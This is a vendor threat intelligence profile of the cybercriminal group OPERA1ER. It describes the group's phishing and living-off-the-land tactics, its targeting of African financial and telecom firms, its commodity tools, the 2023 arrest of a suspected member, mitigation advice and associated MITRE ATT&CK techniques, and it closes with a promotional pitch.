Threat Actor Profile: OPERA1ER

Overview 

OPERA1ER is a financially motivated cybercriminal group that has been active since at least 2018, conducting a series of highly targeted intrusions across multiple regions, with a strong concentration in Africa and parts of Asia and Latin America. Between 2018 and 2022, the group successfully carried out more than 30 confirmed attacks, stealing a minimum of $11 million, with some estimates suggesting total losses could reach as high as $30 million. 

Unlike many advanced threat groups that rely on proprietary malware, OPERA1ER distinguishes itself through its consistent use of publicly available tools, commodity malware, and “living-off-the-land” techniques. This approach allows the group to blend into normal system activity, reducing the likelihood of detection while maintaining operational flexibility.  

Their campaigns are primarily focused on financial theft, often targeting organizations repeatedly and leveraging compromised infrastructure to expand their reach into additional victim environments. 

Operational Activity and Attack Lifecycle

OPERA1ER campaigns typically begin with carefully crafted phishing operations designed to gain initial access to victim environments. These phishing attempts may involve malicious attachments, embedded links, or social engineering tactics that impersonate trusted entities. In some cases, attackers manipulate email headers or spoof sender identities to bypass both human scrutiny and automated defenses. 

Once access is established, the group relies heavily on built-in system utilities and legitimate administrative tools to execute commands and maintain persistence. Tools such as command-line interpreters, PowerShell, and scheduled task mechanisms are frequently abused to ensure recurring execution of malicious payloads. This method allows attackers to operate without introducing highly suspicious binaries into the environment. 

Persistence is often achieved through boot or logon initialization scripts, as well as event-triggered execution mechanisms. These techniques enable malicious code to run automatically in response to system events, often under elevated privilege contexts such as SYSTEM or service accounts. 

To expand their foothold, OPERA1ER actors leverage credential harvesting and valid account abuse, enabling lateral movement across networks. By using legitimate credentials, they can bypass access controls and maintain long-term access while appearing as authorized users. Additionally, process injection techniques are sometimes employed to execute malicious code within trusted processes, further obscuring detection. 

Targeting Profile 

OPERA1ER operates across a wide geographic footprint, with confirmed activity in countries including Argentina, Bangladesh, Burkina Faso, Benin, Cameroon, Gabon, Mali, Niger, Nigeria, Paraguay, Sierra Leone, Senegal, Togo, and Uganda.  

The group concentrates its efforts primarily on the Banking, Financial Services, and Insurance (BFSI) sector, as well as telecommunications providers, exploiting the financial systems and transaction infrastructures within these industries to maximize monetary gain. 

 A distinctive feature of OPERA1ER’s campaigns is their tendency to repeatedly target previously compromised victims. In multiple instances, the group has leveraged existing access to infiltrate additional organizations, effectively transforming victim infrastructure into a staging ground for subsequent attacks and expanding their operational reach. 

Malware and Tooling 

Rather than developing custom malware, OPERA1ER relies on a diverse toolkit of publicly available and commercially accessible tools.  

Key Tools and Malware Families 

• Metasploit: A widely used penetration testing framework developed in collaboration with the open-source community and Rapid7. While intended for defensive security testing, OPERA1ER uses Metasploit to exploit known vulnerabilities, gain unauthorized access, and execute post-exploitation activities.  

• Ngrok: A legitimate reverse proxy service that creates secure tunnels to internal systems. The group uses Ngrok to expose compromised systems to the internet, enabling remote control, lateral movement, and data exfiltration. This technique has also been observed in operations linked to other threat actors such as UNC3944 and Scattered Spider.  

• PsExec: A Microsoft Sysinternals tool created by Mark Russinovich. OPERA1ER abuses PsExec to execute commands on remote systems, facilitating lateral movement and privilege escalation within compromised networks.  

• Revealer Keylogger: A simple yet effective keylogging tool capable of capturing keystrokes, including credentials entered without masking. It is typically deployed covertly to harvest sensitive user information.  

• Agent Tesla: A .NET-based remote access trojan and spyware active since 2014. Delivered primarily through phishing campaigns, it supports credential theft through keylogging, clipboard capture, and screen recording.  

• BitRAT: A low-cost remote access trojan (approximately $20 on underground markets) that provides capabilities such as credential theft, DDoS attacks, and surveillance. It is commonly distributed via phishing emails and trojanized software. 

• BlackNET RAT: An open-source botnet framework developed in VB.NET, offering extensive functionality including file exfiltration, password theft, and cryptojacking.  

• RDPWrap: A tool that enables multiple concurrent Remote Desktop Protocol (RDP) sessions without modifying system files. OPERA1ER may exploit this to maintain unauthorized remote access and facilitate lateral movement.  

• VenomRAT: A remote access trojan derived from QuasarRAT, featuring anti-detection mechanisms such as ScrubCrypt. It is often distributed through malicious PowerShell commands or disguised files, including shortcut-based delivery mechanisms.  

Law Enforcement Actions and Disruption 

A breakthrough in efforts to counter OPERA1ER came in mid-2023, when the threat actor faced a setback following a coordinated international effort known as Operation Nervone. In early June 2023, authorities in Côte d’Ivoire arrested a suspected senior member of the group, with the operation publicly announced on 5 July 2023.  

This marked a major disruption to a network responsible for over 30 cyberattacks and financial losses estimated between $11 million and $30 million. The operation was the result of close collaboration between INTERPOL, AFRIPOL and local authorities, supported by intelligence from the United States Secret Service and Booz Allen Hamilton.  

By combining insights across agencies, investigators were able to trace the group’s activities, identify operational patterns, and locate key individuals.  

Strategic Assessment 

OPERA1ER represents a highly pragmatic cybercriminal operation that prioritizes efficiency and scalability over technical novelty. By leveraging legitimate tools and widely available malware, the group minimizes its operational footprint while maintaining effectiveness across diverse targets. 

Their ability to repeatedly exploit compromised environments and repurpose victim infrastructure demonstrates a high level of operational discipline and resource optimization. Additionally, their focus on financially lucrative sectors such as BFSI underscores a clear and consistent motivation centered on monetary gain. 

While not considered an advanced persistent threat in the traditional sense, OPERA1ER’s methods are effective precisely because they exploit common security gaps, particularly in credential management, phishing awareness, and monitoring of legitimate tool usage. 

Conclusion 

OPERA1ER is a cyber threat to financial and telecommunications organizations, using phishing, credential abuse, and legitimate tools to operate stealthily and steal millions in funds. Organizations can defend against such actors by enhancing user awareness, monitoring tool usage, and leveraging advanced threat intelligence. 

Cyble’s AI-powered platform provides real-time insights, predictive analytics, and automated responses, helping security teams detect and neutralize threats like OPERA1ER before they escalate. Schedule a personalized demo with Cyble today to strengthen your cybersecurity posture and stay ahead of cyber threats like OPERA1ER. 

Recommendations and Mitigation Strategies 

• Implement Advanced Email Security: Deploy phishing detection, anti-spam, and attachment scanning to block malicious emails and links used by OPERA1ER.  

• Enforce Multi-Factor Authentication (MFA): Require MFA for all accounts, especially administrative and financial systems, to prevent unauthorized access from stolen credentials.  

• Regularly Patch and Update Systems: Keep operating systems, applications, and network devices up to date to reduce exposure to known vulnerabilities exploited by the group.  

• Monitor and Restrict Administrative Tools: Track the use of legitimate tools like PsExec, Metasploit, and RDPWrap, and limit access to authorized personnel only.  

• Network Segmentation: Isolate critical financial and telecommunications systems from general networks to limit lateral movement in case of compromise.  

• Deploy Endpoint Detection and Response (EDR): Use EDR solutions to detect abnormal processes, keylogging attempts, or unauthorized remote access activity.  

• Credential Management: Regularly rotate privileged credentials and monitor for unauthorized use or unusual login activity.  

• Conduct Security Awareness Training: Educate employees about phishing, social engineering, and safe practices to reduce the risk of initial access.  

• Continuous Traffic and Anomaly Monitoring: Analyze network traffic for unusual patterns, including unexpected remote connections, VPN tunnels, or reverse proxies like ngrok.  

• Leverage Threat Intelligence: Integrate platforms like Cyble to gain real-time insights into OPERA1ER activity, identify emerging threats, and automate proactive responses. 

MITRE ATT&CK Techniques Associated with OPERA1ER

• Phishing (T1566 | Initial Access): Sent malicious emails or links using spoofing and social engineering to trick users into installing malware or exposing credentials.  

• Scheduled Task/Job (T1053 | Execution): Used OS task scheduling to run malware at startup or on a recurring basis, hiding it under trusted processes.  

• Command and Scripting Interpreter (T1059 | Execution): Ran scripts and commands via PowerShell, Unix shells, Python, or JavaScript, delivered through email or C2.  

• Boot/Logon Scripts (T1037 | Privilege Escalation): Leveraged scripts executed at boot or login to persist and escalate privileges.  

• Event Triggered Execution (T1546 | Privilege Escalation): Used system or cloud event triggers to automatically execute malicious code and elevate privileges.  

• Obfuscated Files (T1027 | Defense Evasion): Encrypted, encoded, or split files to hide malware from detection.  

• Process Injection (T1055 | Defense Evasion): Injected code into legitimate processes to evade security monitoring and gain higher privileges.  

• Valid Accounts (T1078 | Defense Evasion): Abused existing or inactive accounts to access, persist, and move laterally across networks.  

• Acquire Infrastructure (T1583 | Resource Development): Rented or purchased servers, domains, and botnets to stage and conceal operations.  

• Establish Accounts (T1585 | Resource Development): Created fake accounts and personas on third-party services to support long-term targeting.